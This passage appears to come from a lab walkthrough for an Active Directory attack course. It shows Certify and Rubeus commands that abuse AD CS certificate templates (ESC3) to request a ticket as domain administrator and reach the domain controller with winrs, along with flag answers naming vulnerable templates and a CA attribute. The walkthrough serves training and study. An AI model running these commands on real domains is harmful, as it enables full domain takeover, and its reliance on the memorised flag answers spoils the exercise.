at ?????????????????????????????????????????.????????????????????????????????????????(String , Int32 )
at ?????????????????????????????????????????.?????????????????????????????????????????(String , String , String , String , String , Boolean )
Certify completed in 00:00:10.4411528
c:\AD\Tools>
Convert the pem to esc3-DA.pfx using openssl and use the pfx with Rubeus:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:moneycorp.local\administrator /certificate:C:\AD\Tools\esc3-DA.pfx /dc:mcorp-dc.moneycorp.local /password:SecretPass@123 /pttFinally, access mcorp-dc!
winrs -r:mcorp-dc cmd /c set usernameC:\AD\Tools>winrs -r:mcorp-dc cmd /c set username
mcorp\administratorFlag 33 [dcorp-dc] – Name of the AD CS template that has ENROLLEE_SUPPLIES_SUBJECT 🚩
Using C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject command we can see the Name of the AD CS template that has ENROLLEE_SUPPLIES_SUBJECT is: HTTPSCertificates
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : HTTPSCertificates
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure EmailFlag 34 [dcorp-dc] – Name of the AD CS template that has EKU of Certificate Request Agent and grants enrollment rights to Domain Users 🚩
The name of the AD CS template that has EKU of Certificate Request Agent and grants enrollment rights to Domain Users is: SmartCardEnrollment-Agent
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SmartCardEnrollment-Agent
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Certificate Request Agent
mspki-certificate-application-policy : Certificate Request AgentFlag 35 [dcorp-dc] – Name of the CA attribute that allows requestor to provide Subject Alternative Names 🚩
The name of the CA attribute that allows requestor to provide Subject Alternative Names is: EDITF_ATTRIBUTESUBJECTALTNAME2
[!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject Alternative Names!Flag 36 [dcorp-dc] – Name of the group that has enrollment rights on the CA-Integration template 🚩
Using Certify.exe find command we can see the group that has enrollment rights on the CA-Integration template
